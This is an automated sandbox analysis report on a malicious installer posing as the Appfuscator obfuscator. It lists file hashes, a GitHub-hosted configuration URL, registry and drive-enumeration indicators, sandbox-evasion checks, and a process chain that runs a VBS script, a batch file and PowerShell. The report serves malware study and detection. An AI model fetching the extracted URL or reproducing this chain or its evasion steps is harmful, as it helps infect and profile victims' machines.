Analysis
-
max time kernel
68s -
max time network
71s -
platform
windows10-2004_x64 -
resource
win10v2004-20230621-en -
resource tags
arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system -
submitted
28/06/2023, 04:26
Static task
static1
Behavioral task
behavioral1
Sample
Appfuscator.exe
Resource
win10v2004-20230621-en
General
-
Target
Appfuscator.exe
-
Size
17.8MB
-
MD5
1d77daf0ee57b74a227ac9859b6b1c9a
-
SHA1
1b7f0cca9f1df29bd00d238c4d787c2466740427
-
SHA256
f4e196c0538f09394df20b15acbe61b2bf5e19e249e7109a1a0a46708630ecf0
-
SHA512
8db332f5216610d6cf1072bb5893a9e8b17fecd9af9200a14d199b2996e2974a29f21581ad11120eb3450329fd0fa916f741931f409b6a1cef04f9bcf6081e46
-
SSDEEP
393216:rEXgMoSvBfMDM+qa/yTTYxYEUMtzDwPhxS+/+F63ts+:4XtNMw+vETLMlGwC+6T
Malware Config
Extracted
https://raw.githubusercontent.com/ThunderboltDev/IP-BLACKLIST/main/blacklist_ips.js
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 43 3144 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4025927695-1301755775-2607443251-1000\Control Panel\International\Geo\Nation Appfuscator.exe Key value queried \REGISTRY\USER\S-1-5-21-4025927695-1301755775-2607443251-1000\Control Panel\International\Geo\Nation cscript.exe -
Executes dropped EXE 2 IoCs
pid Process 2324 MSI358D.tmp 3388 start.exe -
Loads dropped DLL 20 IoCs
pid Process 1132 MsiExec.exe 1132 MsiExec.exe 1132 MsiExec.exe 1132 MsiExec.exe 1132 MsiExec.exe 1132 MsiExec.exe 1132 MsiExec.exe 1132 MsiExec.exe 1132 MsiExec.exe 1132 MsiExec.exe 1132 MsiExec.exe 1132 MsiExec.exe 1132 MsiExec.exe 1132 MsiExec.exe 1132 MsiExec.exe 4192 MsiExec.exe 4192 MsiExec.exe 4192 MsiExec.exe 4192 MsiExec.exe 4192 MsiExec.exe -
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource yara_rule behavioral1/files/0x00060000000231ad-432.dat agile_net -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\L: Appfuscator.exe File opened (read-only) \??\N: Appfuscator.exe File opened (read-only) \??\X: Appfuscator.exe File opened (read-only) \??\J: Appfuscator.exe File opened (read-only) \??\T: Appfuscator.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\K: Appfuscator.exe File opened (read-only) \??\Q: Appfuscator.exe File opened (read-only) \??\I: Appfuscator.exe File opened (read-only) \??\V: Appfuscator.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\P: Appfuscator.exe File opened (read-only) \??\P: Appfuscator.exe File opened (read-only) \??\R: Appfuscator.exe File opened (read-only) \??\R: Appfuscator.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\I: Appfuscator.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\B: Appfuscator.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\N: Appfuscator.exe File opened (read-only) \??\S: Appfuscator.exe File opened (read-only) \??\Q: Appfuscator.exe File opened (read-only) \??\Z: Appfuscator.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\T: Appfuscator.exe File opened (read-only) \??\U: Appfuscator.exe File opened (read-only) \??\Z: Appfuscator.exe File opened (read-only) \??\G: Appfuscator.exe File opened (read-only) \??\O: Appfuscator.exe File opened (read-only) \??\Y: Appfuscator.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\L: Appfuscator.exe File opened (read-only) \??\X: Appfuscator.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\H: Appfuscator.exe File opened (read-only) \??\U: Appfuscator.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\G: Appfuscator.exe File opened (read-only) \??\S: Appfuscator.exe File opened (read-only) \??\W: Appfuscator.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\B: Appfuscator.exe File opened (read-only) \??\K: Appfuscator.exe File opened (read-only) \??\M: Appfuscator.exe File opened (read-only) \??\V: Appfuscator.exe File opened (read-only) \??\E: Appfuscator.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\A: Appfuscator.exe File opened (read-only) \??\W: Appfuscator.exe File opened (read-only) \??\A: Appfuscator.exe File opened (read-only) \??\M: Appfuscator.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\O: Appfuscator.exe File opened (read-only) \??\S: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 44 api.ipify.org 45 api.ipify.org -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\66 Bit\Appfuscator\unins000.exe msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\blacklist_ips.js powershell.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\7z.sfx msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\hr.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\sw.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\readme.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\ast.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\et.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\lv.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\7-zip32.dll msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\el.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\uz.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\AppFuscator.exe msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\ru.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\pt.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\uz-cyrl.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\af.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\nb.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\tk.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\tt.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\start.exe msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\Mono.Cecil.Mdb.dll msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\Newtonsoft.Json.dll msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\io.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\sk.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\tr.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\zh-cn.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\fi.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\lij.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\StackTraceDecoder.exe msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\AgileDotNet.VMRuntime.dll msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\cy.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\be.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\gl.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\ta.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\7zG.exe msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\ar.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\ga.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\7z.exe msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\va.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\ku.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\tg.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\7zCon.sfx msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\is.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\sv.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\tmp cmd.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\bg.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\hi.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\nl.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\kaa.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\ko.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\mn.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\sl.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\sq.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\uk.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\ca.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\ja.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\mr.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\vi.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\unins000.dat msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\co.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\fur.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\eo.txt msiexec.exe File created C:\Program Files (x86)\66 Bit\Appfuscator\install\7-Zip\Lang\ext.txt msiexec.exe -
Drops file in Windows directory 14 IoCs
description ioc Process File created C:\Windows\Installer\e5724ff.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI358D.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI2E1A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI25B8.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI26F2.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI279F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI281D.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\e5724fd.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI2741.tmp msiexec.exe File opened for modification C:\Windows\Installer\e5724fd.msi msiexec.exe File created C:\Windows\Installer\SourceHash{D2AB51B9-BC7C-4B86-86AD-C9FACBF7E2FF} msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000b3688a723d11638b0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000b3688a720000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d012000000000000000032000000ffffffff000000000700010000680900b3688a72000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01232000000000020ed0d000000ffffffff000000000700010000680919b3688a72000000000000d0123200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000b3688a7200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1f msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\1E\52C64B7E msiexec.exe -
Modifies registry class 23 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9B15BA2DC7CB68B468DA9CAFBC7F2EFF msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9B15BA2DC7CB68B468DA9CAFBC7F2EFF msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9B15BA2DC7CB68B468DA9CAFBC7F2EFF\Version = "16777216" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9B15BA2DC7CB68B468DA9CAFBC7F2EFF\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\66 Bit\\Appfuscator 1.0.0\\install\\" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9B15BA2DC7CB68B468DA9CAFBC7F2EFF\Clients = 3a0000000000 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\9B15BA2DC7CB68B468DA9CAFBC7F2EFF\MainFeature msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9B15BA2DC7CB68B468DA9CAFBC7F2EFF\PackageCode = "DD93875DCE0BDDA4CAA5C3F508A25CDD" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9B15BA2DC7CB68B468DA9CAFBC7F2EFF\AuthorizedLUAApp = "0" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9B15BA2DC7CB68B468DA9CAFBC7F2EFF\DeploymentFlags = "3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9B15BA2DC7CB68B468DA9CAFBC7F2EFF\SourceList\PackageName = "Appfuscator.msi" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9B15BA2DC7CB68B468DA9CAFBC7F2EFF\SourceList\Net msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9B15BA2DC7CB68B468DA9CAFBC7F2EFF\SourceList\Media msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9B15BA2DC7CB68B468DA9CAFBC7F2EFF\ProductName = "Appfuscator" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9B15BA2DC7CB68B468DA9CAFBC7F2EFF\Language = "1033" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9B15BA2DC7CB68B468DA9CAFBC7F2EFF\AdvertiseFlags = "388" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\3F4E04C6571ADA54C916A8E3702B037B msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9B15BA2DC7CB68B468DA9CAFBC7F2EFF\SourceList\Media\DiskPrompt = "[1]" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9B15BA2DC7CB68B468DA9CAFBC7F2EFF\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\66 Bit\\Appfuscator 1.0.0\\install\\" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9B15BA2DC7CB68B468DA9CAFBC7F2EFF\Assignment = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9B15BA2DC7CB68B468DA9CAFBC7F2EFF\InstanceType = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\3F4E04C6571ADA54C916A8E3702B037B\9B15BA2DC7CB68B468DA9CAFBC7F2EFF msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9B15BA2DC7CB68B468DA9CAFBC7F2EFF\SourceList msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\9B15BA2DC7CB68B468DA9CAFBC7F2EFF\SourceList\Media\1 = "Disk1;Disk1" msiexec.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 968 msiexec.exe 968 msiexec.exe 2324 MSI358D.tmp 2324 MSI358D.tmp 3144 powershell.exe 3144 powershell.exe 3144 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 968 msiexec.exe Token: SeCreateTokenPrivilege 1056 Appfuscator.exe Token: SeAssignPrimaryTokenPrivilege 1056 Appfuscator.exe Token: SeLockMemoryPrivilege 1056 Appfuscator.exe Token: SeIncreaseQuotaPrivilege 1056 Appfuscator.exe Token: SeMachineAccountPrivilege 1056 Appfuscator.exe Token: SeTcbPrivilege 1056 Appfuscator.exe Token: SeSecurityPrivilege 1056 Appfuscator.exe Token: SeTakeOwnershipPrivilege 1056 Appfuscator.exe Token: SeLoadDriverPrivilege 1056 Appfuscator.exe Token: SeSystemProfilePrivilege 1056 Appfuscator.exe Token: SeSystemtimePrivilege 1056 Appfuscator.exe Token: SeProfSingleProcessPrivilege 1056 Appfuscator.exe Token: SeIncBasePriorityPrivilege 1056 Appfuscator.exe Token: SeCreatePagefilePrivilege 1056 Appfuscator.exe Token: SeCreatePermanentPrivilege 1056 Appfuscator.exe Token: SeBackupPrivilege 1056 Appfuscator.exe Token: SeRestorePrivilege 1056 Appfuscator.exe Token: SeShutdownPrivilege 1056 Appfuscator.exe Token: SeDebugPrivilege 1056 Appfuscator.exe Token: SeAuditPrivilege 1056 Appfuscator.exe Token: SeSystemEnvironmentPrivilege 1056 Appfuscator.exe Token: SeChangeNotifyPrivilege 1056 Appfuscator.exe Token: SeRemoteShutdownPrivilege 1056 Appfuscator.exe Token: SeUndockPrivilege 1056 Appfuscator.exe Token: SeSyncAgentPrivilege 1056 Appfuscator.exe Token: SeEnableDelegationPrivilege 1056 Appfuscator.exe Token: SeManageVolumePrivilege 1056 Appfuscator.exe Token: SeImpersonatePrivilege 1056 Appfuscator.exe Token: SeCreateGlobalPrivilege 1056 Appfuscator.exe Token: SeCreateTokenPrivilege 1056 Appfuscator.exe Token: SeAssignPrimaryTokenPrivilege 1056 Appfuscator.exe Token: SeLockMemoryPrivilege 1056 Appfuscator.exe Token: SeIncreaseQuotaPrivilege 1056 Appfuscator.exe Token: SeMachineAccountPrivilege 1056 Appfuscator.exe Token: SeTcbPrivilege 1056 Appfuscator.exe Token: SeSecurityPrivilege 1056 Appfuscator.exe Token: SeTakeOwnershipPrivilege 1056 Appfuscator.exe Token: SeLoadDriverPrivilege 1056 Appfuscator.exe Token: SeSystemProfilePrivilege 1056 Appfuscator.exe Token: SeSystemtimePrivilege 1056 Appfuscator.exe Token: SeProfSingleProcessPrivilege 1056 Appfuscator.exe Token: SeIncBasePriorityPrivilege 1056 Appfuscator.exe Token: SeCreatePagefilePrivilege 1056 Appfuscator.exe Token: SeCreatePermanentPrivilege 1056 Appfuscator.exe Token: SeBackupPrivilege 1056 Appfuscator.exe Token: SeRestorePrivilege 1056 Appfuscator.exe Token: SeShutdownPrivilege 1056 Appfuscator.exe Token: SeDebugPrivilege 1056 Appfuscator.exe Token: SeAuditPrivilege 1056 Appfuscator.exe Token: SeSystemEnvironmentPrivilege 1056 Appfuscator.exe Token: SeChangeNotifyPrivilege 1056 Appfuscator.exe Token: SeRemoteShutdownPrivilege 1056 Appfuscator.exe Token: SeUndockPrivilege 1056 Appfuscator.exe Token: SeSyncAgentPrivilege 1056 Appfuscator.exe Token: SeEnableDelegationPrivilege 1056 Appfuscator.exe Token: SeManageVolumePrivilege 1056 Appfuscator.exe Token: SeImpersonatePrivilege 1056 Appfuscator.exe Token: SeCreateGlobalPrivilege 1056 Appfuscator.exe Token: SeCreateTokenPrivilege 1056 Appfuscator.exe Token: SeAssignPrimaryTokenPrivilege 1056 Appfuscator.exe Token: SeLockMemoryPrivilege 1056 Appfuscator.exe Token: SeIncreaseQuotaPrivilege 1056 Appfuscator.exe Token: SeMachineAccountPrivilege 1056 Appfuscator.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1056 Appfuscator.exe 1056 Appfuscator.exe -
Suspicious use of WriteProcessMemory 42 IoCs
description pid Process procid_target PID 968 wrote to memory of 1132 968 msiexec.exe 84 PID 968 wrote to memory of 1132 968 msiexec.exe 84 PID 968 wrote to memory of 1132 968 msiexec.exe 84 PID 1056 wrote to memory of 2432 1056 Appfuscator.exe 86 PID 1056 wrote to memory of 2432 1056 Appfuscator.exe 86 PID 1056 wrote to memory of 2432 1056 Appfuscator.exe 86 PID 968 wrote to memory of 4120 968 msiexec.exe 92 PID 968 wrote to memory of 4120 968 msiexec.exe 92 PID 968 wrote to memory of 4192 968 msiexec.exe 94 PID 968 wrote to memory of 4192 968 msiexec.exe 94 PID 968 wrote to memory of 4192 968 msiexec.exe 94 PID 968 wrote to memory of 2324 968 msiexec.exe 95 PID 968 wrote to memory of 2324 968 msiexec.exe 95 PID 968 wrote to memory of 2324 968 msiexec.exe 95 PID 3388 wrote to memory of 1432 3388 start.exe 99 PID 3388 wrote to memory of 1432 3388 start.exe 99 PID 1432 wrote to memory of 1972 1432 cscript.exe 100 PID 1432 wrote to memory of 1972 1432 cscript.exe 100 PID 1972 wrote to memory of 4644 1972 cmd.exe 102 PID 1972 wrote to memory of 4644 1972 cmd.exe 102 PID 1972 wrote to memory of 3816 1972 cmd.exe 103 PID 1972 wrote to memory of 3816 1972 cmd.exe 103 PID 1972 wrote to memory of 2648 1972 cmd.exe 104 PID 1972 wrote to memory of 2648 1972 cmd.exe 104 PID 1972 wrote to memory of 772 1972 cmd.exe 105 PID 1972 wrote to memory of 772 1972 cmd.exe 105 PID 1972 wrote to memory of 2748 1972 cmd.exe 106 PID 1972 wrote to memory of 2748 1972 cmd.exe 106 PID 1972 wrote to memory of 3576 1972 cmd.exe 107 PID 1972 wrote to memory of 3576 1972 cmd.exe 107 PID 1972 wrote to memory of 3600 1972 cmd.exe 108 PID 1972 wrote to memory of 3600 1972 cmd.exe 108 PID 1972 wrote to memory of 4468 1972 cmd.exe 109 PID 1972 wrote to memory of 4468 1972 cmd.exe 109 PID 1972 wrote to memory of 696 1972 cmd.exe 110 PID 1972 wrote to memory of 696 1972 cmd.exe 110 PID 1972 wrote to memory of 3144 1972 cmd.exe 111 PID 1972 wrote to memory of 3144 1972 cmd.exe 111 PID 1972 wrote to memory of 116 1972 cmd.exe 112 PID 1972 wrote to memory of 116 1972 cmd.exe 112 PID 116 wrote to memory of 3264 116 cmd.exe 113 PID 116 wrote to memory of 3264 116 cmd.exe 113 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Appfuscator.exe"C:\Users\Admin\AppData\Local\Temp\Appfuscator.exe"1⤵
- Checks computer location settings
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Users\Admin\AppData\Local\Temp\Appfuscator.exe"C:\Users\Admin\AppData\Local\Temp\Appfuscator.exe" /i "C:\Users\Admin\AppData\Roaming\66 Bit\Appfuscator 1.0.0\install\Appfuscator.msi" AI_EUIMSI=1 APPDIR="C:\Program Files (x86)\66 Bit\Appfuscator" SHORTCUTDIR="C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Appfuscator" SECONDSEQUENCE="1" CLIENTPROCESSID="1056" CHAINERUIPROCESSID="1056Chainer" ACTION="INSTALL" EXECUTEACTION="INSTALL" CLIENTUILEVEL="0" ADDLOCAL="MainFeature" PRIMARYFOLDER="APPDIR" ROOTDRIVE="F:\" AI_DETECTED_DOTNET_VERSION="4.8" AI_SETUPEXEPATH="C:\Users\Admin\AppData\Local\Temp\Appfuscator.exe" SETUPEXEDIR="C:\Users\Admin\AppData\Local\Temp\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1687685897 " TARGETDIR="F:\" AI_SETUPEXEPATH_ORIGINAL="C:\Users\Admin\AppData\Local\Temp\Appfuscator.exe" AI_INSTALL="1"2⤵
- Enumerates connected drives
PID:2432
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:968 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 736DF2E233828BC946CD8E7B5A52B5F9 C2⤵
- Loads dropped DLL
PID:1132
-
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:4120
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 85C37A87FB0F44A7DE273DEA18738F9D2⤵
- Loads dropped DLL
PID:4192
-
-
C:\Windows\Installer\MSI358D.tmp"C:\Windows\Installer\MSI358D.tmp" "C:\Program Files (x86)\66 Bit\Appfuscator\install\start.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2324
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
PID:4968
-
C:\Program Files (x86)\66 Bit\Appfuscator\install\start.exe"C:\Program Files (x86)\66 Bit\Appfuscator\install\start.exe"1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3388 -
C:\Windows\system32\cscript.exe"C:\Windows\sysnative\cscript" C:\Users\Admin\AppData\Local\Temp\3827.tmp\3828.tmp\3829.vbs //Nologo2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1432 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start.bat3⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1972 -
C:\Windows\system32\chcp.comchcp.com 4374⤵PID:4644
-
-
C:\Windows\system32\find.exefind4⤵PID:3816
-
-
C:\Windows\system32\findstr.exefindstr /L /I set start.bat4⤵PID:2648
-
-
C:\Windows\system32\findstr.exefindstr /L /I goto start.bat4⤵PID:772
-
